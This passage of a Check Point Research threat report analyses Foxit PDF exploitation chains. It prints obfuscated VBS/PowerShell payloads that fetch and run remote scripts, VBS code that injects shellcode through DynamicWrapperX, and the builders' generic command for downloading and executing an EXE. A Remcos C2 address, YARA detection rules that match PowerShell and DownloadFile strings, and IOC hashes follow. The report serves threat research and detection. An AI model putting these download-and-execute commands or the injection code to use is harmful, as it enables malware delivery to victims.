RWQICZXUBCOZEYOXXOLPHN = 0\r\nWQCRFZGGQLHDIRTXIFVENK = \".\"\r\nYLVTDQQXKKQGPFGEOSJZOP = \"$HEVCFLOVSDUCGFHQTKFAHKD = '[]\u003c)#]1%$-63\u003c578699)@3#y]\u003c)#]1%$-63\u003c578699)@3#t@%\\@2351$\r\n$HQZNQSANBGESOEVVYSOBKZQ = ($HEVCFLOVSDUCGFHQTKFAHKD -Join '')|\u0026('I'+'EX');\r\n$HSCYFSROAUPLLCWDPFTSSSZ = '[-!]#\u003c)}-[1=\u0026*=-/=)0_0}y-!]#\u003c)}-[1=\u0026*=-/=)0_0}-$)047)[({2\\$40(!5$9{)\\{4@0+!*83\\=8(\r\n$HVILEIYVLFQVNERXEWCGCXO = ($HSCYFSROAUPLLCWDPFTSSSZ -Join '')|\u0026('I'+'EX');$HVSQXGOSZZWOBNBTGXRCCZL = '\u0026@_-)*0\r\n;$HJCNHHHRXRCBHPAEKDHSXUX = '_]81{)-=]#\\872]20\\39$53\u003c73-//{#/_1+\u00264%8*(}7+tR3\u003c73-//{#/_1+\u00264%8*(}7+%}[0%58)75/^{\r\n$HDRRVVKQKQNGJTRCWXTFBBJ = 'G36=[_^+{34+%8+\\48#/+$!t\u0026#-$^#!/\u002679346)265}]\u0026[36=[_^+{34+%8+\\48#/+$!(6@!\\}_\u0026+(/#^@\r\n$HQLHKKPKITBTDYXPDFDXDCN = '=14\u0026\u0026!*6}12=_047\u003c0$4*%75(-^77{]*}_+=!\u003c[\u003c@@#8a1#\u00260\\/6^%#08}/\\-[@/15^To75(-^77{]*}_+\r\n\u0026('I'+'EX')($HQZNQSANBGESOEVVYSOBKZQ::new($HVILEIYVLFQVNERXEWCGCXO::$HVSQXGOSZZWOBNBTGXRCCZL('hxxps://www.digi\r\nDUHJKVWUERPRNNKARQDOXB = StrReverse(\" \"+\"l\"+\"l\"+\"e\"+\"h\"+\"s\"+\"r\"+\"e\"+\"w\"+\"o\"+\"p\")\r\nSet ITTTPGKCLFFSQRFUUWYUSV = GetObject(StrReverse(\":\"+\"s\"+\"t\"+\"m\"+\"g\"+\"m\"+\"n\"+\"i\"+\"w\") _\r\n \u0026 StrReverse(\"\\\"+\"\\\"+\"!\"+\"}\"+\"e\"+\"t\"+\"a\"+\"n\"+\"o\"+\"s\"+\"r\"+\"e\"+\"p\"+\"m\"+\"i\"+\"=\"+\"l\"+\"e\"+\"v\"+\"e\"+\"L\"+\"n\"+\"o\"+\"\r\n \u0026 WQCRFZGGQLHDIRTXIFVENK \u0026 StrReverse(\"2\"+\"v\"+\"m\"+\"i\"+\"c\"+\"\\\"+\"t\"+\"o\"+\"o\"+\"r\"+\"\\\"))\r\nSet RPFCRWSNXWFCEAQKDKOGWP = ITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"p\"+\"u\"+\"t\"+\"r\"+\"a\"+\"t\"+\"S\"+\"s\"+\"se\"+\"c\"+\"o\r\nSet NDGKJWLKGWSPQZGHKLTLZG = RPFCRWSNXWFCEAQKDKOGWP.SpawnInstance_\r\nNDGKJWLKGWSPQZGHKLTLZG.ShowWindow = RWQICZXUBCOZEYOXXOLPHN\r\n' Create Notepad process\r\nSet WTQVYZLZBRCALBUSHDHPJG = ITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"s\"+\"s\"+\"e\"+\"c\"+\"o\"+\"r\"+\"P\"+\"_\"+\"2\"+\"3\"+\"n\"\r\nRASUVEQBLDGPFLLFXDQZRH = WTQVYZLZBRCALBUSHDHPJG.Create _\r\n (DUHJKVWUERPRNNKARQDOXB+YLVTDQQXKKQGPFGEOSJZOP, Null, NDGKJWLKGWSPQZGHKLTLZG, intProcessID)\r\nself.close\r\n\u003c/script\u003e\r\n\u003cbody\u003e\r\nHBar\r\n\u003c/body\u003e\r\n\u003c/HEAD\u003e\r\n\u003c/HTML\u003e\r\nCode 22 – 5th Payload code.\r\nAt this stage, the attack chain employed two PDF files employing distinct methods of “exploitation” and entailed seven\r\nrequests and executions of scripting language files. The seventh payload (VBS) contains embedded Base64 strings.\r\n1. DynamicWrapperX  Loader, dynwrapx.dll (stored as  AUTOUPDATESTART.dll )\r\n2. Shellcode, to be injected into the Loader\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 23 of 32\n\nDCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (str_temp) \u0026 \"\\\" \u0026 str_autoupdatestart \u0026 \".BIN\"\r\nstr_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (\"%WINDIR%\" \u0026 \"\\\" \u0026 str_rundll32)\r\nstr_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS\r\n(\"%WINDIR%\")\u0026\"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD.EXE\"\r\nWRITE_FILE DCOM_NAME,TEXTTOBINARY(str_base64_1, \"BIN.BASE64\")\r\nSHELLOBJ.RUN \"REGSVR32.EXE /I /S \"\u0026 CHR(7.5+7.6+7.4+8.5+1.5+1.5)\u0026DCOM_NAME\u0026\r\nCHR(7.5+7.6+7.4+8.5+1.5+1.5),0,TRUE\r\nSET DCOM = CREATEOBJECT(\"DYNAMICWRAPPERX\")\r\nDCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (str_temp) \u0026 \"\\\" \u0026 str_autoupdatestart \u0026 \".BIN\" IF\r\nNOT IS_DOTNET THEN str_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (\"%WINDIR%\" \u0026 \"\\\" \u0026\r\nstr_rundll32) ELSE str_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS\r\n(\"%WINDIR%\")\u0026\"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD.EXE\" END IF WRITE_FILE\r\nDCOM_NAME,TEXTTOBINARY(str_base64_1, \"BIN.BASE64\") DO SHELLOBJ.RUN \"REGSVR32.EXE /I /S \"\u0026\r\nCHR(7.5+7.6+7.4+8.5+1.5+1.5)\u0026DCOM_NAME\u0026 CHR(7.5+7.6+7.4+8.5+1.5+1.5),0,TRUE SET DCOM =\r\nCREATEOBJECT(\"DYNAMICWRAPPERX\")\r\nDCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (str_temp) \u0026 \"\\\" \u0026 str_autoupdatestart \u0026 \".BIN\"\r\nIF NOT IS_DOTNET THEN\r\n str_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (\"%WINDIR%\" \u0026 \"\\\" \u0026 str_rundll32)\r\nELSE\r\n str_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (\"%WINDIR%\")\u0026\"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD\r\nEND IF\r\nWRITE_FILE DCOM_NAME,TEXTTOBINARY(str_base64_1, \"BIN.BASE64\")\r\nDO\r\nSHELLOBJ.RUN \"REGSVR32.EXE /I /S \"\u0026 CHR(7.5+7.6+7.4+8.5+1.5+1.5)\u0026DCOM_NAME\u0026 CHR(7.5+7.6+7.4+8.5+1.5+1.5),0,TRU\r\nSET DCOM = CREATEOBJECT(\"DYNAMICWRAPPERX\")\r\nCode 23 – Creation of DynamicWrapperX.\r\nDCOM.REGISTER \"KERNEL32.DLL\", \"VirtualAlloc\",LCASE(\"I=PUUU\"), LCASE(\"R=P\")\r\nLOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(str_base64_2)/2,4096,64)FOR I = 1 TO LEN (str_base64_2) STEP 2\r\nCHAR = ASC(CHR(\"\u0026H\"\u0026MID (str_base64_2,I,2)))\r\nDCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2\r\nDCOM.REGISTER \"KERNEL32.DLL\", \"VirtualAlloc\",LCASE(\"I=PUUU\"), LCASE(\"R=P\") .... LOADER_PTR =\r\nDCOM.VIRTUALALLOC (0,LEN(str_base64_2)/2,4096,64)FOR I = 1 TO LEN (str_base64_2) STEP 2 CHAR =\r\nASC(CHR(\"\u0026H\"\u0026MID (str_base64_2,I,2))) DCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2\r\nDCOM.REGISTER \"KERNEL32.DLL\", \"VirtualAlloc\",LCASE(\"I=PUUU\"), LCASE(\"R=P\")\r\n....\r\nLOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(str_base64_2)/2,4096,64)FOR I = 1 TO LEN (str_base64_2) STEP 2\r\nCHAR = ASC(CHR(\"\u0026H\"\u0026MID (str_base64_2,I,2)))\r\nDCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2\r\nCode 24 – Allocation and Injection of Shellcode.\r\nOnce the injection process is completed, it proceeds to load and execute the Shellcode, which subsequently decrypts the\r\nmalicious executable. The infection ultimately manifests as Remcos RAT with the command and control server located\r\nat  139.99.85[.]106:2404 , operating under the botnet name “ Telegram : @Silentkillertv ”. Another instance of\r\nRemcos, identified by the hash  2266f701f749d4f393b8a123bd7208ec7d5b18bbd22eb47853b906686327ad59 , also utilizes the\r\nsame command and control server. However, in this case, the botnet name was “ RemoteHost ”.\r\nCheck Point managed to uncover various “online-fingerprints,” ranging from YouTube and TikTok accounts to Telegram\r\naccounts and channels established by the actor. These platforms were utilized to disseminate malicious tools and resources.\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 24 of 32\n\nFigure 21 - \u003ccode\u003e@Silentkillertv\u003c/code\u003e\r\nYouTube Chanel.\r\nFigure 21 –  @Silentkillertv  YouTube Chanel.\r\nFigure 22 - Telegram Account \u0026 Channel.\r\nFigure 22 – Telegram Account \u0026 Channel.\r\nTelegram Message from the Threat Actor:\r\nConnected to the Internet and the world of piracy since 2003\r\nI don't have another name online and I never remember I cheated on anyone because this goes against my religion, and that's\r\nso bad, that's why I'm honest with people and there's nothing that scares me.\r\nA fraudster usually has many names and accounts assigned to fraud. I don’t have any other channel or name\r\nYou don’t have to buy and use my tools, but don’t accuse anyone of being a scam because you don’t have the money to buy\r\nand use the tools.\r\nAdvice for beggars Instead of looking for free tools and begging, go learn to program and develop yourself and don’t waste\r\nyour time on empty things.\r\nName: The Silent Killer Connected to the Internet and the world of piracy since 2003 I don't have another name online and I\r\nnever remember I cheated on anyone because this goes against my religion, and that's so bad, that's why I'm honest with\r\npeople and there's nothing that scares me. A fraudster usually has many names and accounts assigned to fraud. I don’t have\r\nany other channel or name You don’t have to buy and use my tools, but don’t accuse anyone of being a scam because you\r\ndon’t have the money to buy and use the tools. Advice for beggars Instead of looking for free tools and begging, go learn to\r\nprogram and develop yourself and don’t waste your time on empty things. Greetings to everyone @Silentkillertv\r\nName: The Silent Killer\r\nConnected to the Internet and the world of piracy since 2003\r\nI don't have another name online and I never remember I cheated on anyone because this goes against my religio\r\nA fraudster usually has many names and accounts assigned to fraud. I don’t have any other channel or name\r\nYou don’t have to buy and use my tools, but don’t accuse anyone of being a scam because you don’t have the mon\r\nAdvice for beggars Instead of looking for free tools and begging, go learn to program and develop yourself and\r\nGreetings to everyone\r\n@Silentkillertv\r\nBuilders\r\nAfter comprehending the exploit and identifying its key components, we initiated a hunt for additional malicious samples.\r\nAmong the pool of collected files, we discovered several .NET and Python files that triggered our detection rule. Upon\r\ncloser examination, we determined that these files were, in fact, the builders responsible for generating malicious samples.\r\nRegardless of the programming language, all builders exhibit a consistent structure. The PDF template utilized for the\r\nexploit includes placeholder text, which is intended to be substituted once the user provides input for the URL from which to\r\ndownload the malicious file.\r\nPython Builders\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 25 of 32\n\nCheck Point obtained two Python Builders, which were developed by the same author as they feature identical Python code.\r\nThe only variation lies in the PowerShell command embedded in the PDF exploit template.\r\nFigure 23 – Python Builder Source Code.\r\nThe command employed in this builder initially utilizes CMD, which then triggers PowerShell.\r\nFigure 24 – Builder’s Command.\r\nIn the other Python builder, instead of dropping the payload as a  .vbs  file, it is dropped as a  .exe  file.\r\nOnce the actor has successfully built the PDF exploit, the final message is written in Portuguese: “Payload generated\r\nsuccessfully.”\r\n.NET Builders\r\nFor .NET, we obtained multiple Builders “Avict Softwares I Exploit PDF”, “PDF Exploit Builder 2023”, and “FuckCrypt.”\r\nAll of those three builders have similar code, and we wouldn’t be surprised if actors stole each other’s code and made their\r\nown builders.\r\nFigure 25 – “Avict Softwares I Exploit PDF” Builder.\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 26 of 32\n\nFigure 26 – “Avict Softwares” interface.\r\nFigure 27 – “PDF Exploit Builder 2023” Template is stored as a Resource.\r\nFigure 28 – “FuckCrypt” interface.\r\n“FuckCrypt” comprises two functionalities: one is “Exe to VBS,” and the other is the PDF exploit.\r\nAll the builders have the “same” commands and flow. The only thing different between them is the filenames. Below is their\r\ngeneric command with $+STRING, which shows the differences between them.\r\n/F (CMD) /P (/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile('$URL',\r\n'$DROPPED_FILENAME.exe')\" \u003e\u003e $BAT_FILENAME.bat \u0026@echo timeout /t 5 \u003e\u003e $BAT_FILENAME.bat \u0026@echo start\r\n$DROPPED_FILENAME.exe \u003e\u003e $BAT_FILENAME.bat \u0026@echo Set oShell = CreateObject (\"Wscript.Shell\") \u003e\u003e\r\n$VBS_FILENAME.vbs \u0026@echo Dim strArgs \u003e\u003e $VBS_FILENAME.vbs \u0026@echo strArgs = \"cmd /c\r\n$BAT_FILENAME.bat\" \u003e\u003e $VBS_FILENAME.vbs \u0026@echo oShell.Run strArgs, 0, false \u003e\u003e $VBS_FILENAME.vbs \u0026\r\n$VBS_FILENAME.vbs \u0026dEl $VBS_FILENAME.vbs\r\n/F (CMD) /P (/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile('$URL',\r\n'$DROPPED_FILENAME.exe')\" \u003e\u003e $BAT_FILENAME.bat \u0026@echo timeout /t 5 \u003e\u003e $BAT_FILENAME.bat \u0026@echo start\r\n$DROPPED_FILENAME.exe \u003e\u003e $BAT_FILENAME.bat \u0026@echo Set oShell = CreateObject (\"Wscript.Shell\") \u003e\u003e\r\n$VBS_FILENAME.vbs \u0026@echo Dim strArgs \u003e\u003e $VBS_FILENAME.vbs \u0026@echo strArgs = \"cmd /c\r\n$BAT_FILENAME.bat\" \u003e\u003e $VBS_FILENAME.vbs \u0026@echo oShell.Run strArgs, 0, false \u003e\u003e $VBS_FILENAME.vbs \u0026\r\n$VBS_FILENAME.vbs \u0026dEl $VBS_FILENAME.vbs\r\n/F (CMD) /P (/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile('$URL', '$DROPP\r\nCode 25 – Generic Command.\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 27 of 32\n\nThe Python builders share similar names with the “PDF Exploit Builder” (supporting only EXE), implying either they were\r\ndeveloped by the same individual or that one of the builders was “copied” and developed to another language. A scenario\r\nwhere the code was stolen from .NET and rewritten Python seems more plausible. The similarity in names between “Avict\r\nSoftware” (which supports only EXE) and “FuckCrypt” (VBS) indicates a similar situation of potential code stealing\r\nbetween developers or the same author, as seen in the previous scenario.\r\nBuilders Statistics\r\nFrom the observed filenames in the commands, it appears that the most frequently used builder is the “PDF Exploit Builder”\r\n\u0026 Python variants. There’s also the possibility that manual commands were added or that additional builders exist beyond\r\nthose obtained.\r\nFigure 23 - Most Used Builders based on PDF\r\nCommands analysis.\r\nFigure 29 – Most Used Builders based on PDF Commands analysis.\r\nFigure 24 - PDF Commands Executed Analysis.\r\nFigure 30 – PDF Commands Executed Analysis.\r\nExcept from the observed Builders, we also discovered a GitHub project created on February 13 providing another .NET\r\nbuilder with exactly the same “exploit” commands as the previously mentioned. This same Builder is used by the APT\r\ngroup APT-C-35 / DoNot Team.\r\nFigure 25 - GitHub Builder\r\nFigure 31 – GitHub Builder\r\nConclusion\r\nWhile this “exploit” doesn’t fit the classical definition of triggering malicious activities, it could be more accurately\r\ncategorized as a form of “phishing” or manipulation aimed at Foxit PDF Reader users, coaxing them into habitually clicking\r\n“OK” without understanding the potential risks involved. Threat Actors vary from E-crime to APT groups, with the\r\nunderground ecosystem taking advantage of this “exploit” for years, as it had been “rolling undetected” as most AV \u0026\r\nSandboxes utilize the major player in PDF Readers, Adobe. The infection success and the low detection rate allow PDFs to\r\nbe distributed via many untraditional ways, such as Facebook, without being stopped by any detection rules. Check Point\r\nreported the issue to Foxit Reader, which acknowledged it and stated that it would be resolved in version 2024 3.\r\nRecommendations\r\nUntil the software update is applied, Foxit users are advised to remain vigilant about potential exploitation and adhere to\r\nclassic defense practices. To mitigate the risks of being affected by such threats, it is essential to:\r\n1. Keep operating systems and applications updated through timely patches and other means.\r\n2. Be cautious of unexpected emails with links, especially from unknown senders.\r\n3. Enhance cybersecurity awareness among employees.\r\n4. Consult security specialists for any doubts or uncertainties.\r\nProtection\r\nCheck Point Threat Emulation, Harmony Endpoint, and Harmony Mobile Protect provide comprehensive coverage of attack\r\ntactics, file types, and operating systems and protect its customers against the type of attacks and the “exploit” described in\r\nthis report.\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 28 of 32\n\nExploit.Wins.FoxitExploit.ta.A\r\nYara Rules\r\nauthor = \"Antonis Terefos(@Tera0017) @ Check Point Research\"\r\ndescription = \"PDF FOXITReader\"\r\n$pdf_string1 = \"/OpenAction\"\r\n$pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/\r\n$command_string1 = \"(CMD)\" nocase\r\n$command_string2 = \"powershell\" nocase\r\n$command_string3 = \"cmd.exe\" nocase\r\n$command_string4 = \"Wscript.Shell\" nocase\r\n$command_string5 = \"DownloadFile(\" nocase\r\n$command_string6 = \" curl \" nocase\r\n$command_string7 = \" bitsadmin \" nocase\r\n$pdf_header in (0..1024) and all of ($pdf_string*) and any of ($command_string*)\r\nrule exploit_foxit_pdf_builders\r\nauthor = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\ndescription = \"PDF Foxit Reader samples related to builders\"\r\n$builder_string1 = \"startxref\\r\\n1866%%EOF\"\r\n$builder_string2 = \"ID [ (bc38735adadf7620b13216ff40de2b26) (bc38735adadf7620b13216ff40de2b26) ]\"\r\n$pdf_string1 = \"/OpenAction\"\r\n$pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/\r\n$command_string1 = \"(CMD)\" nocase\r\n$command_string2 = \"powershell\" nocase\r\n$command_string3 = \"cmd.exe\" nocase\r\n$command_string4 = \"Wscript.Shell\" nocase\r\n$command_string5 = \"DownloadFile(\" nocase\r\n$command_string6 = \" curl \" nocase\r\n$pdf_header in (0..1024) and any of ($builder_string*) and all of ($pdf_string*) and any of ($command_string*) and any of\r\n($file_string*)\r\nauthor = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\ndescription = \"APT-C-35 / DoNot Team Downloader\"\r\n$code1 = {83 C0 1A 99 B9 1A 00 00 00 F7 F9 8B C2 83 C0 (41| 61)}\r\n$string1 = \"\\\\TestLog\\\\\" ascii fullword\r\n$string2 = \"\\\\Intel\\\\\" ascii fullword\r\n$string3 = \"Computer Name: \" ascii fullword\r\n$string4 = \"IP Address: \" ascii fullword\r\n$string5 = \"User Name: \" ascii fullword\r\n$string6 = \"Operating System Version: \" ascii fullword\r\n$string7 = \"Computer information written to computer_info.txt\" ascii fullword\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 29 of 32\n\n$stirng8 = \"filetoupload\" ascii fullword\r\nuint16(0) == 0x5A4D and 6 of them or ($code1 and 4 of ($string*))\r\nauthor = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\ndescription = \"APT-C-35 / DoNot Team Uploader\"\r\n$code1 = {B8 4F EC C4 4E 41 F7 E8 C1 FA 03 8B C2 C1 E8 1F 03 D0 6B C2 1A 44 2B C0 41 80 C0}\r\n$string1 = \"filetoupload\" ascii fullword\r\n$string2 = \"Path not found: [%s]\\n\" wide fullword\r\n$string3 = \"Directory: %s\\n\" wide fullword\r\n$string4 = \"File: %s\\n\" wide fullword\r\nuint16(0) == 0x5A4D and 4 of them\r\nrule exploit_foxit_pdf { meta: author = \"Antonis Terefos(@Tera0017) @ Check Point Research\" description = \"PDF\r\nFOXITReader\" strings: $pdf_header = \"%PDF-\" $pdf_string1 = \"/OpenAction\" $pdf_string2 = \"/Launch\" $pdf_string3 =\r\n\"/Win\" $pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/ $command_string1 = \"(CMD)\" nocase\r\n$command_string2 = \"powershell\" nocase $command_string3 = \"cmd.exe\" nocase $command_string4 = \"Wscript.Shell\"\r\nnocase $command_string5 = \"DownloadFile(\" nocase $command_string6 = \" curl \" nocase $command_string7 = \"\r\nbitsadmin \" nocase condition: $pdf_header in (0..1024) and all of ($pdf_string*) and any of ($command_string*) } rule\r\nexploit_foxit_pdf_builders { meta: author = \"Antonis Terefos (@Tera0017) @ Check Point Research\" description = \"PDF\r\nFoxit Reader samples related to builders\" strings: $pdf_header = \"%PDF-\" $builder_string1 = \"startxref\\r\\n1866%%EOF\"\r\n$builder_string2 = \"ID [ (bc38735adadf7620b13216ff40de2b26) (bc38735adadf7620b13216ff40de2b26) ]\" $pdf_string1 =\r\n\"/OpenAction\" $pdf_string2 = \"/Launch\" $pdf_string3 = \"/Win\" $pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/\r\n$command_string1 = \"(CMD)\" nocase $command_string2 = \"powershell\" nocase $command_string3 = \"cmd.exe\" nocase\r\n$command_string4 = \"Wscript.Shell\" nocase $command_string5 = \"DownloadFile(\" nocase $command_string6 = \" curl \"\r\nnocase $file_string1 = \".exe\" $file_string2 = \".vbs\" $file_string3 = \".bat\" $file_string4 = \".com\" condition: $pdf_header in\r\n(0..1024) and any of ($builder_string*) and all of ($pdf_string*) and any of ($command_string*) and any of ($file_string*)\r\n} rule donot_downloader { meta: author = \"Antonis Terefos (@Tera0017) @ Check Point Research\" description = \"APT-C-35 / DoNot Team Downloader\" strings: $code1 = {83 C0 1A 99 B9 1A 00 00 00 F7 F9 8B C2 83 C0 (41| 61)} $string1 =\r\n\"\\\\TestLog\\\\\" ascii fullword $string2 = \"\\\\Intel\\\\\" ascii fullword $string3 = \"Computer Name: \" ascii fullword $string4 = \"IP\r\nAddress: \" ascii fullword $string5 = \"User Name: \" ascii fullword $string6 = \"Operating System Version: \" ascii fullword\r\n$string7 = \"Computer information written to computer_info.txt\" ascii fullword $stirng8 = \"filetoupload\" ascii fullword\r\ncondition: uint16(0) == 0x5A4D and 6 of them or ($code1 and 4 of ($string*)) } rule donot_uploader { meta: author =\r\n\"Antonis Terefos (@Tera0017) @ Check Point Research\" description = \"APT-C-35 / DoNot Team Uploader\" strings: $code1\r\n= {B8 4F EC C4 4E 41 F7 E8 C1 FA 03 8B C2 C1 E8 1F 03 D0 6B C2 1A 44 2B C0 41 80 C0} $string1 = \"filetoupload\"\r\nascii fullword $string2 = \"Path not found: [%s]\\n\" wide fullword $string3 = \"Directory: %s\\n\" wide fullword $string4 =\r\n\"File: %s\\n\" wide fullword condition: uint16(0) == 0x5A4D and 4 of them }\r\nrule exploit_foxit_pdf\r\n{\r\n meta:\r\n author = \"Antonis Terefos(@Tera0017) @ Check Point Research\"\r\n description = \"PDF FOXITReader\"\r\n strings:\r\n $pdf_header = \"%PDF-\"\r\n $pdf_string1 = \"/OpenAction\"\r\n $pdf_string2 = \"/Launch\"\r\n $pdf_string3 = \"/Win\"\r\n $pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/\r\n $command_string1 = \"(CMD)\" nocase\r\n $command_string2 = \"powershell\" nocase\r\n $command_string3 = \"cmd.exe\" nocase\r\n $command_string4 = \"Wscript.Shell\" nocase\r\n $command_string5 = \"DownloadFile(\" nocase\r\n $command_string6 = \" curl \" nocase\r\n $command_string7 = \" bitsadmin \" nocase\r\n condition:\r\n $pdf_header in (0..1024) and all of ($pdf_string*) and any of ($command_string*)\r\n}\r\nrule exploit_foxit_pdf_builders\r\n{\r\n meta:\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 30 of 32\n\nauthor = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\n description = \"PDF Foxit Reader samples related to builders\"\r\n strings:\r\n $pdf_header = \"%PDF-\"\r\n $builder_string1 = \"startxref\\r\\n1866%%EOF\"\r\n $builder_string2 = \"ID [ (bc38735adadf7620b13216ff40de2b26) (bc38735adadf7620b13216ff40de2b26) ]\"\r\n $pdf_string1 = \"/OpenAction\"\r\n $pdf_string2 = \"/Launch\"\r\n $pdf_string3 = \"/Win\"\r\n $pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/\r\n $command_string1 = \"(CMD)\" nocase\r\n $command_string2 = \"powershell\" nocase\r\n $command_string3 = \"cmd.exe\" nocase\r\n $command_string4 = \"Wscript.Shell\" nocase\r\n $command_string5 = \"DownloadFile(\" nocase\r\n $command_string6 = \" curl \" nocase\r\n $file_string1 = \".exe\"\r\n $file_string2 = \".vbs\"\r\n $file_string3 = \".bat\"\r\n $file_string4 = \".com\"\r\n condition:\r\n $pdf_header in (0..1024) and any of ($builder_string*) and all of ($pdf_string*) and any of ($command_stri\r\n}\r\nrule donot_downloader\r\n{\r\n meta:\r\n author = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\n description = \"APT-C-35 / DoNot Team Downloader\"\r\n strings:\r\n $code1 = {83 C0 1A 99 B9 1A 00 00 00 F7 F9 8B C2 83 C0 (41| 61)}\r\n $string1 = \"\\\\TestLog\\\\\" ascii fullword\r\n $string2 = \"\\\\Intel\\\\\" ascii fullword\r\n $string3 = \"Computer Name: \" ascii fullword\r\n $string4 = \"IP Address: \" ascii fullword\r\n $string5 = \"User Name: \" ascii fullword\r\n $string6 = \"Operating System Version: \" ascii fullword\r\n $string7 = \"Computer information written to computer_info.txt\" ascii fullword\r\n $stirng8 = \"filetoupload\" ascii fullword\r\n condition:\r\n uint16(0) == 0x5A4D and 6 of them or ($code1 and 4 of ($string*))\r\n}\r\nrule donot_uploader\r\n{\r\n meta:\r\n author = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\n description = \"APT-C-35 / DoNot Team Uploader\"\r\n strings:\r\n $code1 = {B8 4F EC C4 4E 41 F7 E8 C1 FA 03 8B C2 C1 E8 1F 03 D0 6B C2 1A 44 2B C0 41 80 C0}\r\n $string1 = \"filetoupload\" ascii fullword\r\n $string2 = \"Path not found: [%s]\\n\" wide fullword\r\n $string3 = \"Directory: %s\\n\" wide fullword\r\n $string4 = \"File: %s\\n\" wide fullword\r\n condition:\r\n uint16(0) == 0x5A4D and 4 of them\r\n}\r\nIOCs\r\nBuilders:\r\n(Avict Software) 3f291d07a7b0596dcdf6f419e6b38645b77b551a2716649c12b8706d31228d79\r\n(Avict Software) f002712b557a93da23bbf4207e5bc57cc5e4e6e841653ffab59deb97b19f214e\r\n(PDF Exploit Builder) ac7598e2b4dd12ac584a288f528a94c484570582c9877c821c47789447b780ec\r\n(FuckCrypt) 20549f237f3552570692e6e2bb31c4d2ddf8133c5f59f5914522e88239370514\r\n(FuckCrypt) 87effdf835590f85db589768b14adae2f76b59b2f33fae0300aef50575e6340d\r\n(FuckCrypt) 5c42a4b474d7433bd9f1665dc914de7b3cc7fbdb9618b0322324b534440737d7\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 31 of 32\n\n(Python) 79e1cb66cb52852ca3f46a2089115e11fff760227ae0ac13f128dda067675fbc\r\n(Python) a4a8486c26c050ed3b3eb02c826b1b67e505ada0bf864a223287d5b3f7a0cde0\r\nMalicious Files:\r\n(PDF) d44f161b75cba92d61759ef535596912e1ea8b6a5a2067a2832f953808ca8609\r\n(PDF) 9c5883cf118f1d22795f7b5661573f8099554c5a3f78d592e8917917baa6d20f\r\n(PDF) 2aa9459160149ecefd1c9b63420eedc7fe3a21ae0ca3e080c93fd39fef32e9c0\r\n(PDF) 8155a6423d64f30d2994163425d3fbe14a52927d3616ffacea36ddc71a6af4b0\r\n(PDF) c1436f65acbf7123d1a45b0898be69ba964f0c6d569aa350c9d8a5f187b3c0e7\r\n(PDF) de8ecd738f1f24a94aba06f19d426399bc250cc5e7b848b2cbd92fc1d6906403\r\n(Blank-Grabber) d2bd6a05d1e30586216e73602a05367380ae66654cd0bccabb0414ef6810ab18\r\n(Python-Stealer-Dropper) e32d2966a22243f346e06d4da5164abab63c2700c905f22c09a18125ee4de559\r\n(BAT file) eb87ec49879dc44b6794bb70bd6c706e74694e4c2bbc1926dd4cff42e5b63cc6\r\n(BAT file) b59ab9147214bc1682006918692febed4ad37e1d305c5c80dc1ee461914eacd2\r\n(APT-C-35 / DoNot Team Downloader)\r\n4ef9133773d596d1c888b0ffe36287a810042172b0af0dfad8c2b0c9875d1c65\r\n(APT-C-35 / DoNot Team Downloaded1)\r\n3e9a60d5f6174bb1f1c973e9466f3e70c74c771043ee00688e50cac5e8efe185\r\n(APT-C-35 / DoNot Team Uploader)\r\n2d40e892e059850ba708f8092523efeede759ecd6e52d8cb7752462fcdb6f715\r\n(APT-C-35 / DoNot Team 